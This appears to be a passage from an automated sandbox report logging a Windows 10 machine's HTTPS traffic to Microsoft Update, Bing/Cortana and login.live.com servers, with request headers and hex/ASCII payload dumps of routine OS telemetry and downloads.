                                                                                                              2024-10-25 20:21:54 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.164971220.12.23.50443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:23 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mWVXAUOklGATDsF&MD=Pwwdf8r8 HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: */*
                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                              Host: slscr.update.microsoft.com
                                                                                                              2024-10-25 20:22:23 UTC560INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Expires: -1
                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                              MS-CorrelationId: 3515e493-e938-417c-9f5b-82653534bac6
                                                                                                              MS-RequestId: 3e1549a7-a34e-49fe-95b1-bec077d359d3
                                                                                                              MS-CV: mycR3eu3s0SSbsqC.0
                                                                                                              X-Microsoft-SLSClientCache: 1440
                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Date: Fri, 25 Oct 2024 20:22:22 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 30005
                                                                                                              2024-10-25 20:22:23 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                              2024-10-25 20:22:23 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              8192.168.2.1649714204.79.197.200443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:23 UTC812OUTGET /manifest/threshold.appcache HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Origin: https://www.bing.com
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: www.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                              2024-10-25 20:22:23 UTC1200INHTTP/1.1 200 OK
                                                                                                              Cache-Control: private
                                                                                                              Content-Length: 3269
                                                                                                              Content-Type: text/cache-manifest; charset=utf-8
                                                                                                              P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                              Set-Cookie: MUIDB=5047E5942BB2460EA35B53CCF78DDB3D; expires=Wed, 19-Nov-2025 20:22:23 GMT; path=/; HttpOnly
                                                                                                              Set-Cookie: SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=35531570&IPMID=1707317782133; domain=.bing.com; expires=Wed, 19-Nov-2025 20:22:23 GMT; path=/; secure; SameSite=None
                                                                                                              X-EventID: 671bfdff8ab34fff861dd9945df3c6e4
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              X-MSEdge-Ref: Ref A: AECAB2DB9F684FB5A0027228A37155B8 Ref B: DFW30EDGE1717 Ref C: 2024-10-25T20:22:23Z
                                                                                                              Date: Fri, 25 Oct 2024 20:22:23 GMT
                                                                                                              Connection: close
                                                                                                              2024-10-25 20:22:23 UTC3044INData Raw: 43 41 43 48 45 20 4d 41 4e 49 46 45 53 54 0d 0a 23 20 56 65 72 73 69 6f 6e 3a 33 35 35 33 31 35 37 30 0d 0a 43 41 43 48 45 3a 0d 0a 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 0d 0a 2f 72 70 2f 71 53 4b 59 6c 55 33 39 51 77 30 68 2d 63 62 48 32 64 6d 42 54 34 45 68 38 6c 4d 2e 6a 73 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 62 2f 31 37 2f 6a 6e 63 2c 6e 6a 2f 36 61 61 2d 45 46 32 49 41 56 77 6e 54 54 4f 69 77 41 62 68 77 49 5f 56 6d 43 77 2e 6a 73 3f 62 75 3d 44 79 67 78 65 49 51 42 69 51 47 4d 41 59 45 42 65 33 37 45 41 63 63 42 4d 62 63 42 4d 63 6f 42 26 6f 72 3d 77 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 62 2f 31 61 2f 63 69 72 33 2c 6f 72 74 6c
                                                                                                              Data Ascii: CACHE MANIFEST# Version:35531570CACHE:/AS/API/WindowsCortanaPane/V2/Init/rp/qSKYlU39Qw0h-cbH2dmBT4Eh8lM.jshttps://r.bing.com/rb/17/jnc,nj/6aa-EF2IAVwnTTOiwAbhwI_VmCw.js?bu=DygxeIQBiQGMAYEBe37EAccBMbcBMcoB&or=whttps://r.bing.com/rb/1a/cir3,ortl
                                                                                                              2024-10-25 20:22:23 UTC48INData Raw: 2e 63 6f 6d 2f 72 73 2f 32 66 2f 33 6b 2f 63 69 72 33 2c 6f 72 74 6c 2c 63 63 2c 6e 63 2f 39 65 4e 49 33 79 6b 6f 78 55 42 63 66 4e 52 67 44 4a
                                                                                                              Data Ascii: .com/rs/2f/3k/cir3,ortl,cc,nc/9eNI3ykoxUBcfNRgDJ
                                                                                                              2024-10-25 20:22:23 UTC177INData Raw: 61 46 2d 67 30 61 5f 30 63 2e 63 73 73 3f 6f 72 3d 77 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 73 2f 35 58 2f 32 51 71 2f 6f 72 74 6c 2c 63 63 2c 6e 63 2f 6f 6e 72 61 37 50 51 6c 39 6f 35 62 59 54 32 6c 41 53 49 31 42 45 34 44 44 45 73 2e 63 73 73 3f 6f 72 3d 77 0d 0a 68 74 74 70 73 3a 2f 2f 72 2e 62 69 6e 67 2e 63 6f 6d 2f 72 73 2f 36 74 2f 66 48 2f 6e 6a 2f 61 41 42 4c 4e 54 5f 46 56 34 35 51 6a 59 51 66 6e 52 48 72 42 43 41 6b 34 47 55 2e 6a 73 3f 6f 72 3d 77 0d 0a 4e 45 54 57 4f 52 4b 3a 0d 0a 2a
                                                                                                              Data Ascii: aF-g0a_0c.css?or=whttps://r.bing.com/rs/5X/2Qq/ortl,cc,nc/onra7PQl9o5bYT2lASI1BE4DDEs.css?or=whttps://r.bing.com/rs/6t/fH/nj/aABLNT_FV45QjYQfnRHrBCAk4GU.js?or=wNETWORK:*


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              9192.168.2.1649713204.79.197.200443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:23 UTC2229OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                              Origin: https://www.bing.com
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept: */*
                                                                                                              Accept-Language: en-CH
                                                                                                              Content-type: text/xml
                                                                                                              X-Agent-DeviceId: 01000A4109009A83
                                                                                                              X-BM-CBT: 1707317755
                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                              X-BM-DeviceDimensions: 784x984
                                                                                                              X-BM-DeviceDimensionsLogical: 784x984
                                                                                                              X-BM-DeviceScale: 100
                                                                                                              X-BM-DTZ: 60
                                                                                                              X-BM-Market: CH
                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                              X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75
                                                                                                              X-Device-ClientSession: B2DC660161784379B3117A8C8CEC12A1
                                                                                                              X-Device-isOptin: false
                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                              X-Device-OSSKU: 48
                                                                                                              X-Device-Touch: false
                                                                                                              X-DeviceID: 01000A4109009A83
                                                                                                              X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2
                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                              X-PositionerType: Desktop
                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                              X-Search-TimeZone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
                                                                                                              X-UserAgeClass: Unknown
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: www.bing.com
                                                                                                              Content-Length: 765
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                              2024-10-25 20:22:23 UTC765OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 35 35 66 30 38 33 62 65 65 36 39 65 34 31 39 39 38 34 37 66 33 34 64 30 37 38 38 35 62 32 61 39 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 74 6f 74 61 6c 6e 75 6d 62 65 72 4f 66 45 6e 74 72 69 65 73 22 3a 22 30 22
                                                                                                              Data Ascii: <ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>55f083bee69e4199847f34d07885b2a9</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","totalnumberOfEntries":"0"
                                                                                                              2024-10-25 20:22:23 UTC426INHTTP/1.1 204 No Content
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              X-MSEdge-Ref: Ref A: BE5519A18EB74E60A4655CAC10DD4FF2 Ref B: DFW30EDGE1811 Ref C: 2024-10-25T20:22:23Z
                                                                                                              Date: Fri, 25 Oct 2024 20:22:23 GMT
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.164971540.126.31.69443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:24 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/soap+xml
                                                                                                              Accept: */*
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                              Content-Length: 4828
                                                                                                              Host: login.live.com
                                                                                                              2024-10-25 20:22:24 UTC4828OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                              Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                              2024-10-25 20:22:24 UTC569INHTTP/1.1 200 OK
                                                                                                              Cache-Control: no-store, no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Content-Type: application/soap+xml; charset=utf-8
                                                                                                              Expires: Fri, 25 Oct 2024 20:21:24 GMT
                                                                                                              P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                              x-ms-route-info: C538_BAY
                                                                                                              x-ms-request-id: 9c846865-64fb-45d6-8da3-6c070217e1b0
                                                                                                              PPServer: PPV: 30 H: PH1PEPF00011EE1 V: 0
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              Date: Fri, 25 Oct 2024 20:22:23 GMT
                                                                                                              Connection: close
                                                                                                              Content-Length: 11197
                                                                                                              2024-10-25 20:22:24 UTC11197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              11192.168.2.164971623.1.33.206443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-10-25 20:22:24 UTC797OUTGET /rb/17/jnc,nj/6aa-EF2IAVwnTTOiwAbhwI_VmCw.js?bu=DygxeIQBiQGMAYEBe37EAccBMbcBMcoB&or=w HTTP/1.1
                                                                                                              Accept: */*
                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                              Host: r.bing.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=35531570&IPMID=1707317782133
                                                                                                              2024-10-25 20:22:24 UTC1227INHTTP/1.1 200 OK
                                                                                                              Content-Type: application/x-javascript; charset=utf-8
                                                                                                              Server: Kestrel
                                                                                                              Access-Control-Allow-Headers: *
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Last-Modified: Thu, 24 Oct 2024 20:27:02 GMT
                                                                                                              X-EventID: 671b3860c1fc4876840df9555ec28fe7
                                                                                                              UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                              X-AS-InstrumentationOptions: AppServerLoggingMaster=1
                                                                                                              X-AS-MACHINENAME: BNZEEAP00016A4C
                                                                                                              X-AS-SuppressSetCookie: 1
                                                                                                              X-XSS-Protection: 0
                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                              nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
                                                                                                              report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
                                                                                                              Cache-Control: public, max-age=381393
                                                                                                              Expires: Wed, 30 Oct 2024 06:18:57 GMT
                                                                                                              Date: Fri, 25 Oct 2024 20:22:24 GMT
                                                                                                              Content-Length: 21950
                                                                                                              Connection: close
                                                                                                              Alt-Svc: h3=":443"; ma=93600
                                                                                                              Akamai-GRN: 0.95200117.1729887744.412f98ba
                                                                                                              Timing-Allow-Origin: *
                                                                                                              2024-10-25 20:22:24 UTC15157INData Raw: 2f 2a 21 44 69 73 61 62 6c 65 4a 61 76 61 73 63 72 69 70 74 50 72 6f 66 69 6c 65 72 2a 2f 0a 76 61 72 20 42 4d 3d 42 4d 7c 7c 7b 7d 3b 42 4d 2e 63 6f 6e 66 69 67 3d 7b 42 3a 7b 74 69 6d 65 6f 75 74 3a 31 65 33 2c 64 65 6c 61 79 3a 37 35 30 2c 6d 61 78 55 72 6c 4c 65 6e 67 74 68 3a 33 30 30 2c 73 65 6e 64 6c 69 6d 69 74 3a 32 30 2c 6d 61 78 50 61 79 6c 6f 61 64 53 69 7a 65 3a 37 65 33 7d 2c 56 3a 7b 64 69 73 74 61 6e 63 65 3a 32 30 7d 2c 4e 3a 7b 6d 61 78 55 72 6c 4c 65 6e 67 74 68 3a 33 30 30 7d 2c 45 3a 7b 62 75 66 66 65 72 3a 33 30 2c 74 69 6d 65 6f 75 74 3a 35 65 33 2c 6d 61 78 55 72 6c 4c 65 6e 67 74 68 3a 33 30 30 7d 2c 43 3a 7b 64 69 73 74 61 6e 63 65 3a 35 30 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 76 74 28 29 7b 69
                                                                                                              Data Ascii: /*!DisableJavascriptProfiler*/var BM=BM||{};BM.config={B:{timeout:1e3,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:7e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:50}},function(n){function vt(){i
                                                                                                              2024-10-25 20:22:24 UTC6793INData Raw: 69 6f 6e 53 74 61 72 74 2c 69 29 2c 79 74 3d 74 28 6f 2e 63 6f 6e 6e 65 63 74 45 6e 64 2c 69 29 2c 70 74 3d 74 28 6f 2e 72 65 71 75 65 73 74 53 74 61 72 74 2c 69 29 2c 77 74 3d 74 28 6f 2e 72 65 73 70 6f 6e 73 65 53 74 61 72 74 2c 69 29 2c 62 74 3d 74 28 6f 2e 72 65 73 70 6f 6e 73 65 45 6e 64 2c 69 29 2c 6f 74 3d 6e 75 6c 6c 2c 73 74 3d 6e 2e 6c 61 79 6f 75 74 28 29 3b 66 6f 72 28 74 74 3d 30 3b 74 74 3c 73 74 2e 6c 65 6e 67 74 68 3b 74 74 2b 2b 29 7b 76 61 72 20 62 3d 73 74 5b 74 74 5d 2c 64 74 3d 62 2e 5f 65 2c 68 74 3d 62 2e 5f 73 3b 69 66 28 68 74 26 26 67 3d 3d 3d 68 74 29 7b 6f 74 3d 62 2e 69 3b 62 2e 78 3c 68 2e 77 26 26 62 2e 79 3c 68 2e 68 26 26 28 66 3d 65 74 29 3b 62 72 65 61 6b 7d 7d 72 74 3d 7b 5f 72 3a 6f 2c 74 3a 65 74 2c 69 3a 70 2e 6c 65
